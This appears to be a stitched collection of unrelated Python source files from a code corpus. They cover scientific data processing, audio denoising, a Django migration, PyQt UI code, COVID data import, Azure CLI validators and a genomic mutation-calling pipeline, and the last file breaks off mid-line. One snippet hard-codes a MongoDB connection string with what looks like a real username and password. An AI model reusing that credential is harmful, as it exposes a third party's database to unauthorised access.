Reason(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)): """Message providing the reason why the given name is invalid. """ INVALID = "Invalid" ALREADY_EXISTS = "AlreadyExists"
StarcoderdataPython
1644208
#!/usr/bin/env python # JN 2016-05-17 """ This script runs css-prepare, css-cluster, and css-combine in a row. It does not use multi-processing, and it accepts a single file name only. It is generally better to call the css-* scripts one after the other! """ from __future__ import print_function, absolute_import import os from argparse import ArgumentParser from combinato.cluster.prepare import main as prepare_main from combinato.cluster.cluster import main as cluster_main from combinato.cluster.concatenate import main as combine_main from combinato.cluster.create_groups import main as groups_main def main(): parser = ArgumentParser('Simple script for clustering one datafile', epilog='<NAME> (<EMAIL>)') parser.add_argument('--datafile', nargs=1, required=True) parser.add_argument('--neg', default=False, action='store_true') parser.add_argument('--label', nargs=1, default=['simple']) args = parser.parse_args() sign = 'neg' if args.neg else 'pos' sessions = prepare_main(args.datafile, sign, 'index', 0, None, 20000, args.label[0], False, False) if (sessions) : for name, sign, ses in sessions: cluster_main(name, ses, sign) label = 'sort_{}_{}'.format(sign, args.label[0]) outfname = combine_main(args.datafile[0], [os.path.basename(ses[2]) for ses in sessions], label) groups_main(args.datafile[0], outfname) else : print("No spike sessions to sort.") if __name__ == "__main__": main()
StarcoderdataPython
13475
# Copyright (c) 2019 <NAME> and <NAME> # # This file is part of the LipidFinder software tool and governed by the # 'MIT License'. Please see the LICENSE file that should have been # included as part of this software. """Represent a DataFrame to be processed with LipidFinder's workflow.""" import glob import logging import os import pandas class LFDataFrame(pandas.core.frame.DataFrame): """A LFDataFrame object stores a dataframe to be used as input data in LipidFinder. The input data file(s) must comply with the following requirements: - The format must be: CSV, TSV, XLS or XLSX. For the last two the user can also specify the sheet to be read (or the list of sheets if a folder is given as 'src'). - The first column contains an identifier for each row that is unique throughout every file. - There is one column named as "mzCol" parameter and another one as "rtCol" parameter. - Starting from the column index in "firstSampleIndex" parameter, every intensity column must follow. For instance, for 2 samples with 2 technical replicates, 1 quality control sample and 2 solvents, the columns would be as follows: sample11 , sample12 , sample21 , sample22 , QC1 , sol1, sol2 Ensure that samples with multiple technical replicates are given names in the format name1, name2, etc. such that each name is unique for each column. Replicates should be suffixed 1, 2, etc. Attributes: src (Public[str]) Source path where the data was loaded from. _resolution (Private[int]) Number of digits after the radix point in floats. Examples: LFDataFrame objects can be created in two different ways: >>> from Configuration import LFParameters >>> from LFDataFrame import LFDataFrame >>> params = LFParameters(module='peakfilter') >>> csvData = LFDataFrame('input_data.csv', params) >>> xlsData = LFDataFrame('input_data.xls', params, sheet=2) >>> folderData = LFDataFrame('/home/user/data/', params) After loading the required set of parameters, the data can be loaded from a single file ('csvData' and 'xlsData' examples) or from multiple files located in the same folder ('folderData' example). The latter is meant to be used to merge multiple files split by time ranges that represent a single run. The first and last retention time (RT) minutes of every file are trimmed as they are considered unreliable (except for the first and last minutes of the first and last files, respectively). The method supports overlap (after trimming), and the frames retained will be those from the file with the most frames for each overlapping minute. The number of decimal places to keep from the input m/z column can be changed assigning a value to 'resolution' variable. It has been predefined to 6, a standard value in high-resolution liquid-chromatography coupled to mass-spectrometry. """ def __init__(self, src, parameters, resolution=6, sheet=0): # type: (str, LFParameters, int, object) -> LFDataFrame """Constructor of the class LFDataFrame. Keyword Arguments: src -- source path where to load the data from parameters -- LipidFinder's parameters instance (can be for any module) resolution -- number of decimal places to keep from m/z column [default: 6] sheet -- sheet number or list of sheet numbers to read when input file(s) have XLS or XLSX extension (zero-indexed position) [default: 0] """ rtCol = parameters['rtCol'] if (not os.path.isdir(src)): data = self._read_file(src, parameters, sheet) else: # Create a list of the input files in the source folder (in # alphabetical order) fileList = sorted(glob.iglob(os.path.join(src, '*.*'))) if (len(fileList) == 0): raise FileNotFoundError("No files found in '{0}'".format(src)) data = self._read_file(fileList[0], parameters, sheet[0]) if (len(fileList) > 1): # Sort first dataframe by RT data.sort_values([rtCol], inplace=True, kind='mergesort') # Append "minute" column to the dataframe with the # integer part of the float values of its RT column timeCol = 'minute' data = data.assign(minute=data[rtCol].astype(int)) # Since it is the first file, remove the frames # corresponding to the last minute data = data[data[timeCol] != data.iloc[-1][timeCol]] for index, filePath in enumerate(fileList[1:], start=1): chunk = self._read_file(filePath, parameters, sheet[index]) # Sort next chunk dataframe by RT chunk.sort_values([rtCol], inplace=True, kind='mergesort') # Append "minute" column to the dataframe with the # integer part of the float values of its RT column chunk = chunk.assign(minute=chunk[rtCol].astype(int)) # Remove the frames of the first minute chunk = chunk[chunk[timeCol] != chunk.iloc[0][timeCol]] if (index < (len(fileList) - 1)): # Since it is not the last file, remove the # frames corresponding to the last minute chunk = chunk[chunk[timeCol] != chunk.iloc[-1][timeCol]] # Create a dataframe with the number of frames per # minute for both the dataframe and the next chunk overlap = pandas.DataFrame( {'data': data.groupby(timeCol).size(), 'chunk': chunk.groupby(timeCol).size()} ).fillna(0) # Keep the minutes where the number of frames in the # next chunk is higher than in the current dataframe overlap = overlap[overlap['chunk'] > overlap['data']] minutesToReplace = overlap.index.tolist() if (minutesToReplace): # Remove the dataframe frames to be replaced data = data[~data[timeCol].isin(minutesToReplace)] # Append chunk frames preserving the column # order of the main dataframe data = data.append( chunk[chunk[timeCol].isin(minutesToReplace)], ignore_index=True )[data.columns.tolist()] # Drop "minute" column as it will be no longer necessary data.drop(timeCol, axis=1, inplace=True) # Rename first column if no name was given in the input file(s) data.rename(columns={'Unnamed: 0': 'id'}, inplace=True) # Sort dataframe by m/z and RT, and reset the indexing mzCol = parameters['mzCol'] data.sort_values([mzCol, rtCol], inplace=True, kind='mergesort') data.reset_index(drop=True, inplace=True) # Adjust m/z column values to the machine's maximum float # resolution data[mzCol] = data[mzCol].apply(round, ndigits=resolution) super(LFDataFrame, self).__init__(data=data) self.src = src self._resolution = resolution def drop_empty_frames(self, module, parameters, means=False): # type: (str, LFParameters, bool) -> None """Remove empty frames from the dataframe and reset the index. An empty frame is a row for which every sample replicate or sample mean has a zero intensity. Keyword Arguments: module -- module name to write in the logging file parameters -- LipidFinder's parameters instance (can be for any module) means -- check sample means instead of each sample replicate? [default: False] """ if (means): meanColIndexes = [i for i, col in enumerate(self.columns) if col.endswith('_mean')] if (parameters['numSolventReps'] > 0): # The first mean column is for the solvents firstIndex = meanColIndexes[1] else: firstIndex = meanColIndexes[0] lastIndex = meanColIndexes[-1] else: firstIndex = parameters['firstSampleIndex'] - 1 lastIndex = firstIndex \ + (parameters['numSamples'] * parameters['numTechReps']) # Get the indices of all empty frames emptyFrames = self.iloc[:, firstIndex : lastIndex].eq(0).all(axis=1) indices = self[emptyFrames].index.tolist() if (indices): # Drop empty frames and reset the index self.drop(module, labels=indices, axis=0, inplace=True) self.reset_index(drop=True, inplace=True) def drop(self, module, **kwargs): # type: (str, ...) -> LFDataFrame """Wrapper of pandas.DataFrame.drop() with logging report. The report will be updated only if the labels correspond to rows, i.e. kwargs['axis'] == 0 (default value). Keyword Arguments: module -- module name to write in the logging file *kwargs -- arguments to pass to pandas.DataFrame.drop() """ # Create logger to print message to the log file logger = logging.getLogger(module) logger.setLevel(logging.INFO) if ((len(kwargs['labels']) > 0) and (kwargs.get('axis', 0) == 0)): idCol = self.columns[0] idList = [str(x) for x in sorted(self.loc[kwargs['labels'], idCol])] logger.info('%s: removed %d rows. IDs: %s', module, len(idList), ','.join(idList)) return super(LFDataFrame, self).drop(**kwargs) @staticmethod def _read_file(src, parameters, sheet): # type: (str, LFParameters, int) -> pandas.core.frame.DataFrame """Return a dataframe with the same content as the source file, but with retention time in minutes. The read function will be configured based on the file's extension. Accepted extensions: CSV, TSV, XLS, XLSX. Keyword Arguments: src -- source file path parameters -- LipidFinder's parameters instance (can be for any module) sheet -- sheet number to read when the input file has XLS or XLSX extension (zero-indexed position) """ extension = os.path.splitext(src)[1].lower()[1:] # Load file based on its extension if (extension == 'csv'): data = pandas.read_csv(src, float_precision='high') elif (extension == 'tsv'): data = pandas.read_csv(src, sep='\t', float_precision='high') elif (extension in ['xls', 'xlsx']): data = pandas.read_excel(src, sheet_name=sheet) else: raise IOError(("Unknown file extension '{0}'. Expected: csv, tsv, " "xls, xlsx").format(extension)) if (('timeUnit' in parameters) and (parameters['timeUnit'] == 'Seconds')): rtCol = parameters['rtCol'] data[rtCol] = data[rtCol].apply(lambda x: round(x / 60.0, 2)) return data
StarcoderdataPython
3356252
<reponame>BaiYuhaoSpiceeYJ/SEGAN_denoise import argparse import torch import torch.nn as nn from torch.utils.data import DataLoader from segan.models import * from segan.datasets import * import soundfile as sf from scipy.io import wavfile from torch.autograd import Variable import numpy as np import random import librosa import matplotlib import timeit matplotlib.use('Agg') import matplotlib.pyplot as plt import json import glob import os class ArgParser(object): def __init__(self, args): for k, v in args.items(): setattr(self, k, v) def main(opts): assert opts.cfg_file is not None assert opts.test_files is not None assert opts.g_pretrained_ckpt is not None with open(opts.cfg_file, 'r') as cfg_f: args = ArgParser(json.load(cfg_f)) print('Loaded train config: ') print(json.dumps(vars(args), indent=2)) args.cuda = opts.cuda if hasattr(args, 'wsegan') and args.wsegan: segan = WSEGAN(args) else: segan = SEGAN(args) segan.G.load_pretrained(opts.g_pretrained_ckpt, True) if opts.cuda: segan.cuda() segan.G.eval() if opts.h5: with h5py.File(opts.test_files[0], 'r') as f: twavs = f['data'][:] else: # process every wav in the test_files if len(opts.test_files) == 1: # assume we read directory twavs = glob.glob(os.path.join(opts.test_files[0], '**/*.wav'), recursive=True) else: # assume we have list of files in input twavs = opts.test_files print('Cleaning {} wavs'.format(len(twavs))) beg_t = timeit.default_timer() for t_i, twav in enumerate(twavs, start=1): #print(t_i) if not opts.h5: #tbname = os.path.basename(twav) #rate, wav = wavfile.read(twav) wav, rate = librosa.load(twav, sr=8000) wav = np.pad(wav, (0, 4096 - len(wav) % 4096), constant_values=0) wav = normalize_wave_minmax(wav) else: tbname = 'tfile_{}.wav'.format(t_i) wav = twav twav = tbname wav = pre_emphasize(wav, args.preemph) pwav = torch.FloatTensor(wav).view(1,1,-1) if opts.cuda: pwav = pwav.cuda() g_wav, g_c = segan.generate(pwav) rel_path = os.path.relpath(twav, opts.test_files[0]) out_path = os.path.join(opts.synthesis_path, rel_path) if not os.path.exists(os.path.dirname(out_path)): os.makedirs(os.path.dirname(out_path)) if opts.soundfile: sf.write(out_path, g_wav, 8000) else: #wavfile.write(out_path, 8000, g_wav) librosa.output.write_wav(out_path, g_wav, 8000, norm=False) end_t = timeit.default_timer() print('Cleaned {}/{}: {} in {} s'.format(t_i, len(twavs), twav, end_t-beg_t)) beg_t = timeit.default_timer() if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('--g_pretrained_ckpt', type=str, default=None) parser.add_argument('--test_files', type=str, nargs='+', default=None) parser.add_argument('--h5', action='store_true', default=False) parser.add_argument('--seed', type=int, default=111, help="Random seed (Def: 111).") parser.add_argument('--synthesis_path', type=str, default='segan_samples', help='Path to save output samples (Def: ' \ 'segan_samples).') parser.add_argument('--cuda', action='store_true', default=False) parser.add_argument('--soundfile', action='store_true', default=False) parser.add_argument('--cfg_file', type=str, default=None) opts = parser.parse_args() if not os.path.exists(opts.synthesis_path): os.makedirs(opts.synthesis_path) # seed initialization random.seed(opts.seed) np.random.seed(opts.seed) torch.manual_seed(opts.seed) if opts.cuda: torch.cuda.manual_seed_all(opts.seed) main(opts)
StarcoderdataPython
135974
# Generated by Django 3.1.4 on 2021-04-22 11:31 from django.db import migrations import modelcluster.fields class Migration(migrations.Migration): dependencies = [ ('menus', '0009_wagtaillanguage'), ('flex', '0017_auto_20210328_2141'), ] operations = [ migrations.AddField( model_name='flexpage', name='translations', field=modelcluster.fields.ParentalManyToManyField(blank=True, to='menus.WagtailLanguage'), ), migrations.AddField( model_name='formpage', name='translations', field=modelcluster.fields.ParentalManyToManyField(blank=True, to='menus.WagtailLanguage'), ), migrations.AddField( model_name='infopage', name='translations', field=modelcluster.fields.ParentalManyToManyField(blank=True, to='menus.WagtailLanguage'), ), ]
StarcoderdataPython
91387
<reponame>idarlenearaujo/URI_Python<filename>1006.py # entrada 3 float A = float(input()) B = float(input()) C = float(input()) # variaveis (pesos) P1 = 2 P2 = 3 P3 = 5 # calculo da media MEDIA = ((A * P1) + (B*P2) + (C*P3)) / (P1+P2+P3) print('MEDIA = {:.1f}'.format(MEDIA))
StarcoderdataPython
39828
<gh_stars>1-10 #!/usr/bin/env python3 # # Search metadata in the EDAN API # v0.1 # import urllib.parse import urllib.request import datetime import email.utils import uuid import hashlib import json from base64 import b64encode #for testing from urllib.request import Request, urlopen from urllib.error import URLError, HTTPError def queryEDAN(edan_q, url, AppID, AppKey): """ Execute the query """ #Date of request dt = datetime.datetime.now() RequestDate = email.utils.format_datetime(dt) #Generated uniquely for this request Nonce = str(uuid.uuid4()).replace('-', '') #This will be the value of X-AuthContent, each element is joined by a single newline StringToSign = "{}\n{}\n{}\n{}".format(Nonce, edan_q, RequestDate, AppKey) #First hash using SHA1 HashedString = hashlib.sha1(StringToSign.encode('utf-8')).hexdigest() #Base64 encode EncodedString = b64encode(HashedString.encode('utf-8')).decode('utf-8') #Set headers headers = {'X-AppId': AppID, 'X-Nonce': Nonce, 'X-RequestDate': RequestDate, 'X-AuthContent': EncodedString} #Make request req = urllib.request.Request(url = url, headers = headers, method = "GET") try: response = urlopen(req) except HTTPError as e: print('The server couldn\'t fulfill the request.') print('Error: {} ({})'.format(e.reason, e.code)) return False except URLError as e: print('We failed to reach a server.') print('Reason: ', e.reason) return False else: data = response.read().decode('utf-8') return json.loads(data) def searchEDAN(edan_query, AppID, AppKey, rows = 10, start = 0): """ Search EDAN """ #Request edan_query = urllib.parse.quote_plus(edan_query) edan_q = "q={}&rows={}&start={}&facet=true".format(edan_query, rows, start) #Put whole thing together url = 'https://edan.si.edu/metadata/v2.0/collections/search.htm?{}'.format(edan_q) #Execute query result = queryEDAN(edan_q, url, AppID, AppKey) return result def getContentEDAN(edan_id, AppID, AppKey): """ Get details from an item using an EDAN ID """ #Request edan_q = "url={}".format(edan_id) #Put whole thing together url = 'https://edan.si.edu/content/v2.0/content/getContent.htm?{}'.format(edan_q) #Execute query result = queryEDAN(edan_q, url, AppID, AppKey) return result
StarcoderdataPython
111541
# -*- coding: utf-8 -*- # Form implementation generated from reading ui file 'areaDialog.ui' # # Created by: PyQt5 UI code generator 5.13.0 from PyQt5 import QtCore, QtGui, QtWidgets from PyQt5.QtGui import QIcon class Ui_areaDialog(object): def setupUi(self, areaDialog): areaDialog.setObjectName("areaDialog") areaDialog.setWindowIcon(QIcon('camera.png')) areaDialog.resize(280, 160) self.verticalLayout = QtWidgets.QVBoxLayout(areaDialog) self.verticalLayout.setObjectName("verticalLayout") self.horizontalLayout = QtWidgets.QHBoxLayout() self.horizontalLayout.setObjectName("horizontalLayout") self.label = QtWidgets.QLabel(areaDialog) font = QtGui.QFont() font.setPointSize(11) self.label.setFont(font) self.label.setObjectName("label") self.horizontalLayout.addWidget(self.label) spacerItem = QtWidgets.QSpacerItem(298, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum) self.horizontalLayout.addItem(spacerItem) self.verticalLayout.addLayout(self.horizontalLayout) self.horizontalLayout_2 = QtWidgets.QHBoxLayout() self.horizontalLayout_2.setObjectName("horizontalLayout_2") self.areaLineEdit = QtWidgets.QLineEdit(areaDialog) self.areaLineEdit.setEnabled(True) font = QtGui.QFont() font.setPointSize(11) self.areaLineEdit.setFont(font) self.areaLineEdit.setAlignment(QtCore.Qt.AlignCenter) self.areaLineEdit.setReadOnly(True) self.areaLineEdit.setObjectName("areaLineEdit") self.horizontalLayout_2.addWidget(self.areaLineEdit) self.label_2 = QtWidgets.QLabel(areaDialog) font = QtGui.QFont() font.setPointSize(11) self.label_2.setFont(font) self.label_2.setTextFormat(QtCore.Qt.RichText) self.label_2.setObjectName("label_2") self.horizontalLayout_2.addWidget(self.label_2) self.verticalLayout.addLayout(self.horizontalLayout_2) self.horizontalLayout_3 = QtWidgets.QHBoxLayout() self.horizontalLayout_3.setObjectName("horizontalLayout_3") spacerItem1 = QtWidgets.QSpacerItem(153, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum) self.horizontalLayout_3.addItem(spacerItem1) self.areaOKButton = QtWidgets.QPushButton(areaDialog) self.areaOKButton.setObjectName("areaOKButton") self.horizontalLayout_3.addWidget(self.areaOKButton) spacerItem2 = QtWidgets.QSpacerItem(153, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum) self.horizontalLayout_3.addItem(spacerItem2) self.verticalLayout.addLayout(self.horizontalLayout_3) self.retranslateUi(areaDialog) QtCore.QMetaObject.connectSlotsByName(areaDialog) def retranslateUi(self, areaDialog): _translate = QtCore.QCoreApplication.translate areaDialog.setWindowTitle(_translate("areaDialog", "Area")) self.label.setText(_translate("areaDialog", "The area is:")) self.areaLineEdit.setText(_translate("areaDialog", "12345")) self.label_2.setText(_translate("areaDialog", "<html><head/><body><p>m<span style=\" vertical-align:super;\">2</span></p></body></html>")) self.areaOKButton.setText(_translate("areaDialog", "OK"))
StarcoderdataPython
41909
<reponame>rochester-rcl/islandora-import-scripts #work in prgress - This creates a skelatal mods file for the givne set of files templateFile = "C:\\python-scripts\\xml-file-output\\aids_skeletalmods.xml" def createXmlFiles(idList): print("create xml file list") for id in idList: #print("processing id " + id ) tree = ElementTree() tree.parse(templateFile) root = tree.getroot() nameElement = tree.find('titleInfo/title') nameElement.text = id apElement = tree.find('identifier') apElement.text = id root.attrib = {"xmlns:xlink":"http://www.w3.org/1999/xlink", "xmlns:xsi":"http://www.w3.org/2001/XMLSchema-instance", "xmlns":"http://www.loc.gov/mods/v3", "version":"3.5", "xsi:schemaLocation":"http://www.loc.gov/mods/v3 http://www.loc.gov/standards/mods/v3/mods-3-5.xsd"} #print("writing file " + xmlOutputDir + id + ".xml") tree.write(xmlOutputDir + id + ".xml") def createXmlFiles(idList): print("create xml file list") for id in idList: #print("processing id " + id ) tree = ElementTree() tree.parse(templateFile) root = tree.getroot() nameElement = tree.find('titleInfo/title') nameElement.text = id apElement = tree.find('identifier') apElement.text = id root.attrib = {"xmlns:xlink":"http://www.w3.org/1999/xlink", "xmlns:xsi":"http://www.w3.org/2001/XMLSchema-instance", "xmlns":"http://www.loc.gov/mods/v3", "version":"3.5", "xsi:schemaLocation":"http://www.loc.gov/mods/v3 http://www.loc.gov/standards/mods/v3/mods-3-5.xsd"} #print("writing file " + xmlOutputDir + id + ".xml") tree.write(xmlOutputDir + id + ".xml") def processSets(offset, maxFilesToProcess): fileIdList = getFileList(itemDirectory, "tif") setSize = len(fileIdList) if(not maxFilesToProcess): maxFilesToProcess = setSize + 1 if(not offset): offset = 0 offset = int(offset) maxFilesToProcess = int(maxFilesToProcess) setSize = int(setSize) print ("Max files to process = " + str(maxFilesToProcess)) print ("Offset = " + str(offset)) counter = 1 totalBytes = 0 fileSet = [] startCount = 1 for fileName, fileSize in fileIdList.items(): if( (counter >= offset) and (counter <= maxFilesToProcess) ) : print("counter = " + str(counter) + " processing file " + fileName + " with size " + str(fileSize)) nextFile = fileName fileSet.append(fileName) counter = counter + 1 if(len(fileSet) > 0): createXmlFiles(fileSet) # maxFilesPerZip = input("Please enter maximum number of files per zip file: ") maxFilesToProcess = input("Please enter maximum number of files to process enter to process all: ") offset = input("Please enter the offset position (inclusive) press enter to start from the beginning: ") processSets(offset, maxFilesToProcess)
StarcoderdataPython
1778367
<filename>assignments/api/admin/serializers.py # restframework imports from rest_framework import serializers # djnago imports from django.contrib.auth import get_user_model # Local Imports from assignments.models import ( Assignment, AssignmentFile, ) from courses.models import ( Course, CourseSection, ) User = get_user_model() class AssignmentCreateSerializer(serializers.ModelSerializer): course = serializers.PrimaryKeyRelatedField( queryset=Course.objects.all(), required=True ) name = serializers.CharField(required=True) description = serializers.CharField(required=True) index = serializers.IntegerField(required=True) is_active = serializers.BooleanField(required=False) class Meta: model = Assignment fields = [ 'course', 'course_section', 'name', 'description', 'index', 'is_active', ] class AssignmentUpdateSerializer(serializers.ModelSerializer): class Meta: model = Assignment fields = [ 'course', 'course_section', 'name', 'description', 'index', 'is_active', ] class AssignmentFileCreateSerializer(serializers.ModelSerializer): assignment = serializers.PrimaryKeyRelatedField( queryset=Assignment.objects.all(), required=True ) name = serializers.CharField(required=True) file = serializers.FileField( allow_empty_file=False, max_length=2048 ) description = serializers.CharField(required=True) index = serializers.IntegerField(required=True) is_active = serializers.BooleanField(required=False) class Meta: model = AssignmentFile fields = [ 'assignment', 'name', 'file', 'description', 'index', 'is_active', ] class AssignmentFilleUpdateSerializer(serializers.ModelSerializer): class Meta: model = AssignmentFile fields = [ 'assignment', 'name', 'file', 'description', 'index', 'is_active', ]
StarcoderdataPython
4808972
<filename>1-100/5/5.py i = 1 for k in (range(1, 21)): if i % k > 0: for j in range(1, 21): if (i*j) % k == 0: i *= j break print i
StarcoderdataPython
1734987
import pymongo from sqls.config import * def findUsers(): import mysql.connector cxn = mysql.connector.connect( host=databaseConfig.get('hostname'), user=databaseConfig.get('username'), passwd=databaseConfig.get('password'), db=databaseConfig.get('database') ) cursor = cxn.cursor() sql = "SELECT * FROM User" cursor.execute(sql) res = list(cursor.fetchall()) print(res) return res if __name__ == '__main__': myclient = pymongo.MongoClient("mongodb+srv://Sean:wHHf6APYXRCzSozP@<EMAIL>.<EMAIL>.mongodb.net/test?retryWrites=true&w=majority") mydb = myclient["test"] mycol = mydb["user"] x = mycol.find_one() x['_id'] = str(x['_id']) print(x) findUsers()
StarcoderdataPython
3214908
<reponame>COVID-IWG/epimargin-studies<gh_stars>0 #!python3 from pathlib import Path from io import StringIO import numpy as np import pandas as pd import requests def import_and_clean_cases(save_path: Path) -> pd.DataFrame: ''' Import and clean case data from covidtracking.com. ''' # Parameters for filtering raw df kept_columns = ['date','state','positive','death'] excluded_areas = set(['PR','MP','AS','GU','VI']) # Import and save result res = requests.get("https://covidtracking.com/api/v1/states/daily.json") df = pd.read_json(res.text) df.to_csv(save_path/"covidtracking_cases.csv", index=False) # Exclude specific territories and features df = df[~df['state'].isin(excluded_areas)][kept_columns] # Format date properly df.loc[:,'date'] = pd.to_datetime(df.loc[:,'date'], format='%Y%m%d') # Calculate state change in positives/deaths df = df.sort_values(['state','date']) df['delta_positive'] = df.groupby(['state'])['positive'].transform(lambda x: x.diff()) df['delta_death'] = df.groupby(['state'])['death'].transform(lambda x: x.diff()) return df def get_adaptive_estimates(path: Path) -> pd.DataFrame: # Parameters for filtering raw df kept_columns = ['date','state','RR_pred','RR_CI_lower','RR_CI_upper','T_pred', 'T_CI_lower','T_CI_upper','new_cases_ts','anamoly'] # Import and subset columns df = pd.read_csv(path/"adaptive_estimates.csv") df = df[kept_columns] # Format date properly and return df.loc[:,'date'] = pd.to_datetime(df['date'], format='%Y-%m-%d') return df def get_new_rt_live_estimates(path: Path) -> pd.DataFrame: # Parameters for filtering raw df kept_columns = ['date','region','mean','lower_80','upper_80', 'infections','test_adjusted_positive'] # Import and save as csv res = requests.get("https://d14wlfuexuxgcm.cloudfront.net/covid/rt.csv") df = pd.read_csv(StringIO(res.text)) df.to_csv(path/"rtlive_new_estimates.csv", index=False) # Filter to just necessary features df = df[kept_columns] # Format date properly and rename columns df.loc[:,'date'] = pd.to_datetime(df['date'], format='%Y-%m-%d') df.rename(columns={'region':'state','mean':'RR_pred_rtlivenew', 'lower_80':'RR_lower_rtlivenew', 'upper_80':'RR_upper_rtlivenew', 'test_adjusted_positive':'adj_positive_rtlivenew', 'infections':'infections_rtlivenew'}, inplace=True) return df def get_old_rt_live_estimates(path: Path) -> pd.DataFrame: # Parameters for filtering raw df kept_columns = ['date','state','mean','lower_95','upper_95'] # Import and save as csv df = pd.read_csv(path/"rtlive_old_estimates.csv") # Filter to just necessary features df = df[kept_columns] # Format date properly and rename columns df.loc[:,'date'] = pd.to_datetime(df['date'], format='%Y-%m-%d') df.rename(columns={'region':'state','mean':'RR_pred_rtliveold', 'lower_95':'RR_lower_rtliveold', 'upper_95':'RR_upper_rtliveold'}, inplace=True) return df def get_cori_estimates(path: Path) -> pd.DataFrame: # Import and save as csv df = pd.read_csv(path/"cori_estimates.csv") # Format date properly and rename columns df.loc[:,'date'] = pd.to_datetime(df['date'], format='%Y-%m-%d') return df def get_luis_estimates(path: Path) -> pd.DataFrame: # Import and save as csv df = pd.read_csv(path/"luis_code_estimates.csv") # Format date properly and rename columns df.loc[:,'date'] = pd.to_datetime(df['date'], format='%Y-%m-%d') return df
StarcoderdataPython
131982
<reponame>jfcoz/azure-cli # -------------------------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for license information. # -------------------------------------------------------------------------------------------- from knack.util import CLIError def validate_database_args(namespace): if namespace.hot_cache_period: hot_cache_period_in_days = round_hot_cache_to_days(namespace.hot_cache_period) if hot_cache_period_in_days < 0: raise CLIError('hot_cache_period must be a valid time') if namespace.soft_delete_period: soft_delete_period_in_days = round_soft_delete_to_days(namespace.soft_delete_period) if soft_delete_period_in_days < 0: raise CLIError('soft_delete_period must be a valid time') def validate_cluster_args(namespace): max_name_length = 22 name_length = len(namespace.cluster_name) if name_length > max_name_length: raise CLIError('name can not be longer then ' + str(max_name_length) + " letters") def round_hot_cache_to_days(time): return round_timedelta_to_days(time, 'hot_cache_period') def round_soft_delete_to_days(time): return round_timedelta_to_days(time, 'soft_delete_period') def round_timedelta_to_days(time, parameter_name): try: splitted = time.split(":") numberOfDays = int(splitted[0]) if int(splitted[1]) > 0: numberOfDays += 1 return numberOfDays except: raise CLIError(parameter_name + ' must be a valid time format')
StarcoderdataPython
132188
from subprocess import check_output import sys,os,argparse from StaticPath import StaticPath, Separators from time import ctime from SequencingFormats import BAM parser = argparse.ArgumentParser(description=''' ************************************************************************************************ Basic description: Call mutation from tumor and normal bam ************************************************************************************************ Usage instructions: 1. if starts from fq then required arguments include: --normal_fq1 --normal_fq2 --normal_sample_id --tumor_fq1 --tumor_fq2 --tumor_sample_id 2. if starts from bam then required arguments include: --normal_bam --tumor_bam --normal_sample_id --tumor_sample_id ''', formatter_class=argparse.RawTextHelpFormatter ) parser.add_argument('--StartsFromBam', default=False, action='store_true') parser.add_argument('--normal_fq1') parser.add_argument('--normal_fq2') parser.add_argument('--tumor_fq1') parser.add_argument('--tumor_fq2') parser.add_argument('--normal_sample_id') parser.add_argument('--tumor_sample_id') parser.add_argument('--normal_bam') parser.add_argument('--tumor_bam') parser.add_argument('--out_dir', default='./outfiles') args = parser.parse_args() #get the path of two sequencing file FromBam = args.StartsFromBam normal_fq1_path = args.normal_fq1 normal_fq2_path = args.normal_fq2 tumor_fq1_path = args.tumor_fq1 tumor_fq2_path = args.tumor_fq2 normal_sample_id = args.normal_sample_id tumor_sample_id = args.tumor_sample_id output_dir = args.out_dir normal_bam_path = args.normal_bam tumor_bam_path = args.tumor_bam if not (normal_sample_id and tumor_sample_id): print('please specify both tumor and normal id') sys.exit(1) ''' step1 preprocess tumor and normal bam ''' if FromBam: #if starts from bam if not (normal_bam_path and tumor_bam_path): print('please specify --tumor_bam and --normal_bam ') sys.exit(1) print("started preprocess from bams at", ctime()) # preprocess the normal bam normal_out = check_output([sys.executable, "WXS_preprocess.py", "--StartsFromBam", '--bam', normal_bam_path, "--output_dir", output_dir, "--sample_id", normal_sample_id], encoding="UTF-8") normal_bam_path = normal_out.split('\n')[-2] # build the normal bam object normal_bam = BAM(normal_bam_path) # preprocess the tumor bam tunor_out = check_output([sys.executable, "WXS_preprocess.py", "--StartsFromBam", '--bam', tumor_bam_path, "--output_dir", output_dir, "--sample_id", tumor_sample_id], encoding="UTF-8") tumor_bam_path = tunor_out.split('\n')[-2] # #build the tumor bam object tumor_bam = BAM(tumor_bam_path) else: if not (normal_fq1_path and normal_fq2_path and tumor_fq1_path and tumor_fq2_path): print('please specify --normal_fq1 and --normal_fq2 and tumor_fq1 and tumor_fq2') sys.exit(1) print("started preprocess from fastq at", ctime()) # preprocess the normal bam normal_out = check_output([sys.executable, "WXS_preprocess.py", "--fq1", normal_fq1_path, "--fq2", normal_fq2_path, "--output_dir", output_dir, "--sample_id", normal_sample_id], encoding="UTF-8") normal_bam_path = normal_out.split('\n')[-2] # build the normal bam object normal_bam = BAM(normal_bam_path) # preprocess the tumor bam tunor_out = check_output([sys.executable, "WXS_preprocess.py", "--fq1", tumor_fq1_path, "--fq2", tumor_fq2_path, "--output_dir", output_dir, "--sample_id", tumor_sample_id], encoding="UTF-8") tumor_bam_path = tunor_out.split('\n')[-2] # #build the tumor bam object tumor_bam = BAM(tumor_bam_path) #call mutations based on normal bam and tumor bam from subprocess import CalledProcessError,run from GenomeReference import GenomeReference from tools import checkout_dir def call_mutation(tumor_bam, normal_bam, out_dir): #get sample id sample_id = normal_bam.fetch_sample_id() vcf_dir = os.path.join(out_dir, 'vcf') checkout_dir(vcf_dir) case_mutation_vsf = os.path.join(vcf_dir, sample_id+Separators.sample_name_separator+'somatic.vcf') cmd = " ".join(['gatk', 'Mutect2', '-R', GenomeReference.get_reference_fasta(), '-I', tumor_bam.get_path(), '-I', normal_bam.get_path(), '-normal', sample_id, '--germline-resource', StaticPath.germline_file, '--panel-of-normals', StaticPath.pon, '-O', case_mutation_vsf]) try: run([cmd], shell=True, check=True) except CalledProcessError as e: print(e) return case_mutation_vsf call_mutation(tumor_bam, normal_bam, out_dir=output_dir) ''' used for debug ''' # #get the path of tumor and normal fastqs # normal_fq1_path = os.path.join(StaticPath.base_dir, 'FASTQs', 'normal1.fq') # normal_fq2_path = os.path.join(StaticPath.base_dir, 'FASTQs', 'normal2.fq') # tumor_fq1_path = os.path.join(StaticPath.base_dir, 